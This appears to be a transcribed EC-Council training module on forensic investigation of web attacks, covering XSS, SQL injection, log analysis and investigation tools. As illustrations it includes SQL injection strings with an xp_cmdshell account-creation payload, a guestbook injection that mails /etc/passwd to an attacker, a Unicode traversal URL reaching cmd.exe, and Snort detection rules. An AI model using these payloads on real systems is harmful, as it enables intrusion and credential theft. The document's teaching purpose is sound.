File000143

Module XXX – Investigating Web Attacks

EC-CouncilCopyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited

News: Web Application Hacks -Upping The Arms Race

Source: http://www.informationweek.com/



News: Mystery Web Attack Hijacks Your Clipboard

Source: http://www.theregister.co.uk/



News: Georgian Web Attacks are the Work of Kids

Source: http://www.theinquirer.net/



Scenario

Three Russian citizens were charged of extorting money from U.K.’s e-commerce companies on October 4, 2006. Ivan Maksakov, Alexander Petrov, and Denis Stepanovwere accused of receiving $4 million from UK firms. The trio concentrated on U.K.’s Internet gambling sites collecting information about British web casinos and bookmakers’ offices using spy software designed by one of the members and then demanded ransoms from the owners of such websites by threatening them of Denial-of-Service attacks.

In their six months activity, the accused attacked over 54 web servers in 30 different countries. The U.K. National Hi-Tech Crime Unit (NHTCU) and the Russian authorities investigated this case and arrested them.



Case Study: Word Flaw Hit With Zero-Day Attack



Module Objective

• Indications of a Web Attack• Types of Web Attacks • Overview of Web Logs• Investigation of Web Attack• Investigation of FTP Servers• Investigation of IIS Logs• Investigation of Web Attacks in Windows-based Servers• Web page Defacement• Investigation of DNS Poisoning • Investigation of Static and Dynamic IP address• Checklist for Security to Web attacks• Tools for Web Attack Investigations

This module will familiarize you with:



Module Flow

Indications of a Web Attack

Types of Web Attacks

Overview of Web Logs

Investigation of Web Attacks

Investigation of FTP Servers

Investigation of IIS Logs

Investigation of Web Attacks in Windows-based Servers

Web page Defacement

Investigation of DNS Poisoning

Investigation of Static and Dynamic IP Address

Checklist for Security to Web Attacks

Tools for Web AttackInvestigations



Indications of a Web Attack

Customers reporting to an organization that they are not able to access its online service

A legitimate web page being redirected to an unknown website

Frequent rebooting of the server

Anomalies found in the log files



Types of Web Attacks

Cross-Site Scripting (XSS) Attack

Cross-Site Request Forgery (CSRF)

SQL Injection

Code Injection

Command Injection

Parameter Tampering

Cookie Poisoning

Buffer Overflow

Cookie Snooping



Types of Web Attacks (cont’d)

DMZ Protocol Attack

Zero Day Attack

Authentication Hijacking

Log Tampering

Web Services Attack

Directory Traversal

Cryptographic Interception

URL Interpretation

Impersonation Attack



Cross-Site Scripting (XSS)

Cross Site Scripting (XSS or CSS) is an application layer hacking technique

It occurs when a dynamic web page collects malicious data from a user and displays the input on the page without it being properly validated

Cross Site Scripting allows an attacker to embed malicious JavaScript, VBScript, ActiveX, HTML, or Flash into a vulnerable dynamic page and trick the user to execute the script on his machine in order to gather data

The use of XSS might compromise private information, manipulate or steal cookies, create requests that can be mistaken for those of a valid user, or execute malicious code on the end-user systems



Investigating Cross-Site Scripting (XSS)

The regular expression below checks for attacks that may contain HTML opening and closing tags (<>) with any text inside, and their hex equivalents

•/((\%3C)|<)((\%2F)|\/)*[a-z0-9\%]+((\%3E)|>)/ix •((\%3C)|<) - check for opening angle bracket or hex equivalent •((\%2F)|\/)* - the forward slash for a closing tag or its hex equivalent •[a-z0-9\%]+ - check for alphanumeric string inside the tag, or hex

representation of these •((\%3E)|>) - check for closing angle bracket or hex equivalent

Regular Expression for simple CSS attack:

•Alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"NII Cross-site scripting attempt"; flow:to_server,established;•pcre:"/((\%3C)|<)((\%2F)|\/)*[a-z0-9\%]+((\%3E)|>)/i"; classtype:Web-application-attack; sid:9000; rev:5;)

Snort signature:



Investigating Cross-Site Scripting (XSS) (cont’d)

Regular expression for "<img src" CSS attack:

•/((\%3C)|<)((\%69)|i|(\%49))((\%6D)|m|(\%4D))((\%67)|g|(\%47))[^\n]+((\%3E)|>)/I(\%3C)|<) – checks opening angled bracket or hex equivalent

•(\%69)|i|(\%49))((\%6D)|m|(\%4D))((\%67)|g|(\%47) - checks the letters 'img' in varying combinations of ASCII, or upper or lower case hex equivalents

•[^\n]+ - checks any character other than a new line following the <img

•(\%3E)|>) - closing angled bracket or hex equivalent

Paranoid regex for CSS attacks:

•/((\%3C)|<)[^\n]+((\%3E)|>)/I

• It simply looks for the opening HTML tag, and its hex equivalent, followed by one or more characters other than the newline, and then followed by the closing tag or its hex equivalent



Cross-Site Request Forgery (CSRF)

Attacker forces the victim to submit his form data to the victim’s web server

Attacker takes an arbitrary action as soon as the victim takes preventive measures against the web site

It targets the images that are generally found on Internet forums

• Exploit site's trust in a user • Involve sites that rely on the user's identity • Trick a user into sending HTTP requests to a site • Involve HTTP requests that has side-effects

It can:



Anatomy of CSRF Attack

• Attacker hosts a web page with pre-populated HTML form dataStep 1

• Victim browses the attacker’s HTML formStep 2

• Web page automatically submits that pre-populated form data to a site where the victim has access

Step 3

• Site authenticate request (attacker’s form data) come from victimsStep 4

• Attacker’s form data is accepted by the server since it was sent from a legitimate user

Result



Pen-Testing CSRF Validation Fields

• Verify that the validation field is unique for each user

Test 1

• Verify that the validation field cannot be determined by other users• If an attacker can create same validation field for another user, there is

no value in the validation field• Validation field must be unique for each site

Test 2

• Verify that the validation field is never sent on the query string• This data could be leaked in places like HTTP referrer to attacker

Test 3

• Verify request fails when validation field is missing

Test 4



SQL Injection Attacks

SQL injection is a type of security exploit in which the attacker adds SQL code to a Web form input box to gain access to the database resources

For example, in a search page, the developer may execute a query (VBScript/ASP) using the code :

•Set myRecordset = myConnection.execute("SELECT * FROM myTable WHERE someText ='" & request.form("inputdata") & "'")

If a code like “blah or 1=1 –” is used as an input in the search page, it will produce the code in the ASP:

•Set myRecordset = myConnection.execute("SELECT * FROM myTable WHERE someText ='" & blah or 1=1 -- & "'")

• The above statement always comes to be true and returns the recordset



Investigating SQL Injection Attacks

• IDS log files• Database server log files• Web server log files

Look for SQL Injection attack incidents in these locations:

•12:34:35 192.2.3.4 HEAD GET /login.asp?username=blah’ or 1=1 –

•12:34:35 192.2.3.4 HEAD GET /login.asp?username=blah’ or )1=1 (--

•12:34:35 192.2.3.4 HEAD GET /login.asp?username=blah’ or exec master..xp_cmdshell 'net user test testpass --

The attack signature may look like:



News: SQL Injection Attacks Against Databases Rise Sharply

Source: http://computerworld.com/

Info-theft attempts up nearly 40-fold since beginning of year



Code Injection Attack

Code Injection attack is similar to an SQL injection, but instead of SQL command, attackers pass other types of malicious codes like PHP script and shell commands to the web form input box of an application

The purpose of the injected code is to bypass or modify the intended functionality of the program

In this attack, arbitrary code is executed on the target server

• Example: A web server has a “Guest book “script which receives the small messages like• It is nice site!

• Attacker may insert a message “; cat /etc/passwd | mail [email protected] #” which steals the password from web server and e-mails to the attacker



Investigating Code Injection Attack

Executable instruction detector in an Intrusion Detection System (IDS) and a series of sandbox execution environments provided by OS in the network are used to detect the code injection attacks

IDS identifies the series of executable instructions and sends the suspicious packet’s payload to the executable environment matching the packet destination

The proper execution environment is determined by examining the destination’s IP address of the incoming packet

The payload is executed in the corresponding monitored environment and a report containing the payload’s OS resource usage is returned to the IDS

If a report contains evidence of the resource ‘s usage then IDS generates the alerts, otherwise the packet is considered as non-malicious



Parameter Tampering

Parameter tampering is a form of web attack where certain parameters in the URL entered by a user are changed during exchange between the client and the web server without the user's authorization

By modifying the arguments (parameters) in the query, the attacker can navigate through the web and database servers and retrieve or modify there contents



Cookie Poisoning

Cookie poisoning attacks involve the modification of the contents of a cookie in order to steal personal information of a user

Cookies stored on the computer's hard drive maintain bits of information that allow web sites to authenticate the users’ identity, speed up transactions, monitor behavior, and personalize web services

Stolen personal information is generally used for other malicious attacks such as identity theft and online frauds



Investigating Cookie Poisoning Attack

Trace the cookies set commands issued by the web server, and store information such as cookie name, cookie value, IP address, and the session to which that cookie was assigned

Intercepts each HTTP request sent to the web server, retrieves the cookie information out of it, and checks it against all stored cookies

Change in the contents of a cookie determines that the attacks has occurred

Attacker

Attacker sends an invalid cookies to

server

server



Buffer Overflow/Cookie Snooping

• Buffer overflow is the result of writing more data into a buffer than the buffer can hold

• In such attacks, the extra data may contain codes designed to trigger specific actions, sending new instructions to the attacked computer that damage the user's files, change data, or disclose confidential information

• Attackers attempt to overflow vulnerable backend servers with excess requests, and attackers can often execute commands directly on the compromised server

Buffer Overflow:

• Attacker decodes the user’s credentials, and logs on as an authorized user and gains access to the sensitive information

Cookie snooping:



Detecting Buffer Overflow

Nebula (NEtwork-based BUffer overfLow Attack detection) technique detects buffer overflow attacks based solely on the traffic observed without requiring any modifications to the end hosts

Nebula uses a generalized signature that can capture all known variants of buffer overflow attacks while reducing the number of false positives to a negligible level



DMZ Protocol Attack/ Zero Day Attack

• Most web applications include protocols such as DNS and FTP; these protocols have many inherent vulnerabilities and are exploited to gain access to other critical applications

DMZ Protocol Attack

• It refers to the exploits that take advantage of a newly discovered vulnerability in a program or operating system before the software developer finds a solution for that vulnerability

Zero day Attack:



Authentication Hijacking

Authentication prompts a user to supply the credentials that allow access to the application

Enforcing a consistent authentication policy between multiple and disparate applications can prove to be a real challenge

An authentication hijacking can lead to theft of service, session hijacking, and user impersonation



Investigating Authentication Hijacking

Check if the browser remembers the password (a common mistake that most of the users do while selecting ‘password remember’ options)

Look if the user did not log off from the application



Log Tampering

Logs are kept to track the usage patterns of the application

Log tampering allows attackers to cover their tracks or alter web transaction records

Attackers tries to delete logs, modify logs, change user information, or otherwise destroy evidence of any attack



Directory Traversal

Direct traversal occurs when the attacker is able to browse directories and files outside the normal application access

Attack exposes the directory structure of the application, and often the underlying web server and the operating system

Attacker can enumerate contents, access secure or restricted pages, and gain confidential information, and locate the source’s code



Cryptographic Interception

Using cryptography, confidential message scan be securely exchanged between two parties

Encrypted traffic flow through network firewalls and IDS systems is not inspected

Attacker takes advantage of a secure channel, to exploit it more efficiently than an open channel



URL Interpretation and Impersonation Attack

• Web server failing to parse correct URL is termed as URL interpretation• Example: Unicode or superfluous decode attacks

URL Interpretation

• Impersonation attack is the attack where an attacker spoofs web applications by pretending to be a legitimate user

Impersonation Attack



Overview of Web Logs

Log files come handy in detecting web attacks

The source, nature, and time of the attack can be determined by analyzing log files of the compromised system

Log files have HTTP status codes that are specific to the type of incidents

Web servers that run on IIS or Apache are prone to log file deletion by attackers who has access to the web server as log files are stored on the web server itself



Investigating Web Attacks

1.• Analyze web server, ftp, and local system logs to confirm a web attack

2.• Check log file information with respect to time/time stamps, IP address, HTTP status code,

and requested resource

3.

• Identify the nature of the attack. Is it a DDoS attack, or an attack targeted just at you? Is someone trying to shut down your network altogether, or attempting to infiltrate individual machines?

4.• Localize the source

5.• Use your firewall and IDS logs to know where the attack is coming from (or came from!)

6.• This will help you identify whether the attack/penetration is coming from a compromised

host on your network or from the outside world



Investigating Web Attacks (cont’d)

7.• Block the attack

8.

• Once you know where the attack is coming from, you can take action to stop it

9.

• If you have identified specific machines that have been compromised, pull them from the network until you can disinfect them and return them to service

10.

• If an attack or attempted attack is coming from outside, block access to the network from that IP address

11.• START YOUR INVESTIGATION – from the IP address!



Example of FTP Compromise

#nmap -0 23.3.4.5 –p 21

Starting nmap Interesting ports

Port State Service

21/tcp open ftp

80/tcp open www

Remote OS is Windows 2000

ftp 23.3.4.5

Connected to 23.3.4.5

Username:administrator

Password:

Attacker runs port scanning:

The attacker connects using ftp



Investigating FTP Logs

The FTP logs in a Windows 2000 are stored in the directory:

•C:\WINDOWS\system32\LogFiles\MSFTPSVC1

Screenshot of an FTP log:



Investigating FTP Servers

FTP server vulnerabilities allow an attacker to directly compromise the system hosting the FTP server

Direct compromise of an FTP server can be as simple as obtaining legitimate passwords by:

• Social engineering• Brute-force guessing• Network sniffing

Network and FTP logs provide valuable records that can provide valuable evidence



Investigating IIS Logs

IIS logs all the visits in log files. The log file is located at <%systemroot%>\logfiles

If proxies are not used, then IP can be logged

This command lists the log files:

• http://victim.com/scripts/..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+C:\Winnt\system32\Logfiles\W3SVC1.



Investigating Apache Logs

• The Apache server saves diagnostic information and error messages that it encounters while processing requests

• The default path of this file is usr/local/apache/logs/error_log in Linux• It is an important piece of evidence from the investigator’s point of view

• [Sat Dec 11 7:12:36 2004] [error] [client 202.116.1.3] Client sent malformed Host header

Error log:

• It contains requests processed by the Apache server • By default, access logs are stored in the common log format• The default path of this file is usr/local/apache/logs/access_log in Linux• 202.116.1.3 - shilp [11/Dec/2004:6:23:13 -0500] "GET /apache_ft.gif HTTP/1.0"

200 1577

Access log:

The Apache server has two logs, namely:



Investigating Web Attacks in Windows-based Servers

Look for a large number of failed logon attempts or locked out accounts

•C:\> eventvwr.msc

Run event viewer to look at logs:

• Event log service stops• Windows File Protection is not active on the system• The MS Telnet Service started successfully

Check if the following suspicious events have occurred:



Investigating Web Attacks in Windows-Based Servers (cont’d)

•C:\> net view 127.0.0.1

Look at file shares and ensure that each of them has a defined business purpose

•C:\> net session

Look at who has an open session with the system

•C:\> net use

Look at which sessions the machine has opened with other systems

•C:\> nbtstat –S

Look at NetBIOS over TCP/IP activity

•C:\> netstat –na

Look for unusual listening TCP and UDP ports



Investigating Web Attacks in Windows-based Servers (cont’d)

•C:\> at

Look for unusual tasks on the local host such as running as user on administrator’s group as system by

•C:\> lusrmgr.msc

Look for new accounts in the administrator’s group

Look for unexpected processes by running task manager

•C:\> net start

Look for unusual network services

•C:\> dir

Check file space usage to look for sudden decrease in free space



Web Page Defacement

• Attacker convinces the legitimate user to perform an action (i.e., giving away credentials) that may help in attack

• Luring the legitimate user (insider) and gaining credentials• Exploiting implementation and design errors

Attacking techniques:

Unauthorized modification to a web page leads to web page defacement



Web Page Defacement (cont’d)

Web page defacement requires write access privileges in web server root directory

The compromise could come from any security vulnerability such as Unicode and RPC

• Weak administrator password• Application misconfiguration• Server misconfigurations• Accidental permission assignments

The web page defacements are the results of:



Defacement Using DNS Compromise

The attacker can compromise the authoritative domain name server for the web server by redirecting DNS requests for a website to his defaced website

• Webserver DNS entry• www.example.com 192.2.3.4

• Compromised DNS entry by the attacker• www.example.com 10.0.0.3

• Now all requests for www.example.com will be redirected to 10.0.0.3



Investigating DNS Poisoning

If you notice that DNS cache has been corrupted, then dump the contents of the DNS server’s cache to look for inappropriate entries

On Linux systems, use the BIND command:

• #ndc dumpdb

• Database dump initiated

You can enable DNS logging in named.conf but it will slow down the performance of the DNS server



Intrusion Detection

Intrusion Detection is the art of detecting inappropriate, incorrect, or anomalous activity

It can be used to determine if a computer network or server has experienced an unauthorized intrusion

• Host-based Intrusion Detection Systems (HIDS) :• IDS systems that operate on a host to detect malicious activity on that host

• Network -based Intrusion Detection Systems (NIDS):• IDS systems that operate on network data flows

• Intrusion Prevention System (IPS):• This is a system that actively monitors a network or host for attacks and

prevents those attacks from occurring

Types of Intrusion Detection:



Strategies for Securing Web Applications

• Driving ideas for detection of vulnerabilities• Fixing the earlier occurred vulnerabilities• Pen-testing the application as it avoids time for research on vulnerabilities

and analyzing results• Checking for flaws in security through IDS and IPS tools• Improving awareness of good security

Strategies for securing web applications:

@



Investigating Static and Dynamic IP Addresses

Static IP address of a particular host can be found with the help of tools such as NSlookup, Whois, Traceroute, ARIN, and NeoTrace

The DHCP server allocates dynamic IP address to the hosts on a network

The DHCP log file stores information regarding the IP address allocated to a particular host at a particular time



Checklist for Web Security

Avoid user accounts having weak or no password

Block unused open ports

Check for various web attacks

Test if Unicode vulnerability is prevailing

Check whether IDS or IPS is deployed

Look for possible intrusion areas using vulnerability scanner

Test the website to check whether it can handle large loads and SSL if it is an e-commerce website

Document the list of techniques, devices, policies, or necessary steps that offer security



Statistics 2005-2007



Statistics 2005-2007 (cont’d)



Statistics 2000-2007



Dotdefenderhttp://www.applicure.com/

Dotdefender is a web application attack protection tool that blocks attacks that are manifested within the HTTP request logic such as:

• SQL Injection - dotDefender intercepts and blocks attempts to inject SQL statements that corrupt or gain access to the corporate data

• Proxy Takeover - dotDefender intercepts and blocks attempts to divert traffic to an unauthorized site

• Cross-site Scripting - dotDefender intercepts and blocks attempts to inject malicious scripts that hijack the machines of the subsequent site visitors

• Header Tampering - dotDefender identifies and blocks requests containing corrupted header data

• Path Traversal - dotDefender blocks attempts to navigate through the host's internal file system

• Probes - dotDefender detects and blocks attempts to ferret the system ‘s information

• Known Attacks - dotDefender recognizes and blocks attacks bearing known signatures



Dotdefender (cont’d)



AccessDiverhttp://www.accessdiver.com



AccessDiver: Screenshot



Log Analyzer: Server Log Analysishttp://www.w3.org/

Server log analysis analyzes server logs by changing the numeric Internet node numbers into domain names with the help of httpd-analyse.c

httpd-analyse.c is the program that helps the server log analysis tool to perform its function

• A version of the log file with the document name is simplified (if necessary)• IP address is turned into DNA name form

Output:



Web Attack Investigation Tools

Analog is a program which analyzes logfiles from WWW servers that can be installed directly on a virtual server

Deep Log Analyzer is an advanced web analytics solution for small and medium size websites



Web Attack Investigation Tools (cont’d)

AWStats is a free web analysis tool that works as a CGI script on the web server or from the command line that generates advanced web, streaming, ftp or mail server statistics, graphically

WebLog Expert is an access log analyzer which gives the information about the site's visitors such as activity statistics, accessed files, and paths through the site, browsers




AlterWind Log Analyzer Professional is unique web log analysis software

Webalizer is a web server log file analysis program that produces usage statistics in HTML format for viewing with a browser




eWebLog Analyzer is a web server log analyzer that gives you vital information about your website’s usage that can read log files of the most popular web servers, including Microsoft IIS, Apache, and NCSA

N-Stealth 5 is a web vulnerability scanner that scans over 18000 HTTP security issues stealth HTTP Scanner writes scan results to an easy HTML report




Acunetix scans website simulating numerous hacking techniques such as SQL injection, cross site scripting, and Google hacking, in order to identify vulnerabilities in the website

Falcove is used by website owners to see whether their websites are hackable or vulnerable to attacks and to find vulnerabilities before attackers do

Security audit report will show severity of web vulnerabilities found




AppScan provides security testing throughout the application development lifecycle, which tests security assurance in the development stage

Watchfire AppScan automates web application security audits to ensure the security and compliance of websites




Emsa Web Monitor is a small web monitoring program that runs on the desktop and allows the user to monitor uptime status of several websites

WebWatchBot is a monitoring and analysis software for websites and IP devices including Ping, HTTP, HTTPS, SMTP, POP3, FTP, Port, and DNS checks




Paros is a Java based web applications security assessment tool that is used to intercept and modify all HTTP and HTTPS data between the server and the client, including cookies and from fields

HP WebInspect performs web application security testing and assessment for web applications




KeepNI keeps an eye on the website’s functionality and assures that your site is up and fully functional every time

Wikto checks for flaws in webservers and also offers web-based vulnerability scanning




Mapper maps the files, file parameters, and values of any site you wish to test and browses the site as a normal user while recording the session with Achilles (Mapper supports other proxies as well), and runs Mapper on the resulting log file

N-Stalker, a web application security scanner offers a complete suite of web security assessment checks to enhance overall security of web applications against vulnerabilities and attacks




Scrawlr is a HP tool that makes a website to crawl and audits it for SQL Injection vulnerabilities

Exploit-Me is a suite of Firefox web application security testing tools that integrates directly with Firefox and tests vulnerabilities related to web applications




WebAgain protects a website and automatically repairs the content damaged by attackers

UV Uptime Website Defacement Detector detects the defacement to website



Tools for Locating IP Address



Tools for Locating IP Address

Hide Real IP is the tool used to hide the IP address for anonymous Internet access, fake IP appears instead of real IP address

whatismyip is a tool to recognize the real Internet IP address



Tools for Locating IP Address (cont’d)

IP Detective Suite is an IP monitoring program that reports the changing IP address to user’s ftp site or to an e-mail address

Enterprise IP - Address Manager is an application for assigning, cataloging, and maintaining IP addresses and host data for both registered and private TCP/IP addressed networks




Whois Lookup is an online tool for obtaining information about any website

SmartWhois is a useful network information utility that allows you to look up all the available information about an IP address, hostname, or domain




ActiveWhois is a network tool to find any information about an IP address or Internet domain

LanWhois is a program that helps you find out who, where, and when registered the domain or site you are interested in



Nslookup

Nslookup is a program to query Internet domain name servers. Displays information that can be used to diagnose Domain Name System (DNS) infrastructure

Helps to find additional IP addresses if authoritative DNS is known from whois

MX record reveals the IP of the mail server

Both Unix and Windows come with an Nslookup client

Third party clients are also available – E.g. Sam Spade



Nslookup: Screenshot



Traceroutehttp://www.traceroute.org/

Traceroute works by exploiting a feature of the Internet Protocol called TTL, or Time To Live

It reveals the path IP packets travel between two systems by sending out consecutive UDP packets with ever-increasing TTLs

As each router processes an IP packet, it decrements the TTL. When the TTL reaches zero, it sends back a "TTL exceeded" message (using ICMP) to the originator

Routers with DNS entries reveal the name of routers, network affiliation, and geographic location



Tools for Locating IP Address:NeoTrace (Now McAfee Visual Trace)

NeoTrace shows the traceroute output visually – map view, node view and IP view



Whoishttp://www.whois.net/

Whois is the client utility that communicates with WHOIS servers located around the world to obtain information about domain registration

It supports IP address queries and automatically selects the appropriate Whois server for IP addresses



Whois

Registrant:targetcompany (targetcompany-DOM)# Street AddressCity, ProvinceState, Pin, CountryDomain Name: targetcompany.COM

Domain servers in listed order:NS1.WEBHOST.COM XXX.XXX.XXX.XXXNS2.WEBHOST.COM XXX.XXX.XXX.XXX

Administrative Contact:Surname, Name (SNIDNo-ORG) [email protected] (targetcompany-DOM) # Street AddressCity, Province, State, Pin, CountryTelephone: XXXXX Fax XXXXX

Technical Contact:Surname, Name (SNIDNo-ORG) [email protected] (targetcompany-DOM) # Street AddressCity, Province, State, Pin, CountryTelephone: XXXXX Fax XXXXX



CountryWhoishttp://www.tamos.com/

CountryWhois is a utility for identifying the geographic location of an IP address

It is similar to that of SmartWhois where the focus is on IP-to-country identification

• It analyzes server logs • It checks email headers• It identifies online credit card fraud

Features:



CountryWhois: Screenshot



IP2countryhttp://www.ip2country.org/

IP2country identifies visitor's geographical location i.e., country, region, city and ISP, using a proprietary IP address lookup database

• Real time IP geo-location detection• Redirects web pages based on geographical region• Fraud detection (credit card fraud etc.)• Web log statistics and analysis• Spam filtering

Features:



IP2country: Screenshot



CallerIPhttp://www.callerippro.com/

CallerIP helps the user to see when someone has connected to your computer and can report the IP address

It also runs a trace on that IP address

• It offers real time connection monitoring• It identifies the country of origin for all connections made to

your machine• It provides Worldwide Whois reports for any monitored

connection

Features:



CallerIP: Screenshot 1



http://www.whois.net/

Whois.net is an online tool for gaining information about any site



Pandora FMShttp://pandorafms.org/

Pandora FMS is a monitoring Open Source software

• It watches your systems and applications• It allows you to know the status of any element of those systems

Features

• Defacement in the website• If the network’s interface is down• Memory leak in the server application

Pandora FMS detects :



Pandora FMS: Screenshot



CounterStorm-1: Defense Against Known, Zero Day, and Targeted Attacks

The CounterStorm-1 suite of network security appliances offers the most effective defense against known, Zero Day, and Targeted Attacks

It automatically neutralizes attacks within seconds, preventing costly and widespread damage

It does not require signatures, CounterStorm-1 accurately detects attacks in all IP-traffic (TCP, UDP, and ICMP)

It recognizes current attacks and automatically adjusts to future threats

http://www.counterstorm.com



Summary

Cross Site Scripting (XSS or CSS) is considered as an application layer hacking technique

SQL Injection means passing SQL code into an application that was not created by the developer

Cookie Poisoning is the process of tampering with the value of cookies

The source, nature, and time of the attack can be determined by analyzing log files of the compromised system

FTP server vulnerabilities allow an attacker to directly compromise the system hosting the FTP server

Web page defacement requires write access privileges in web server root directory

Intrusion Detection is the art of detecting inappropriate, incorrect, or anomalous activity

File000143

Technology

Transcript of File000143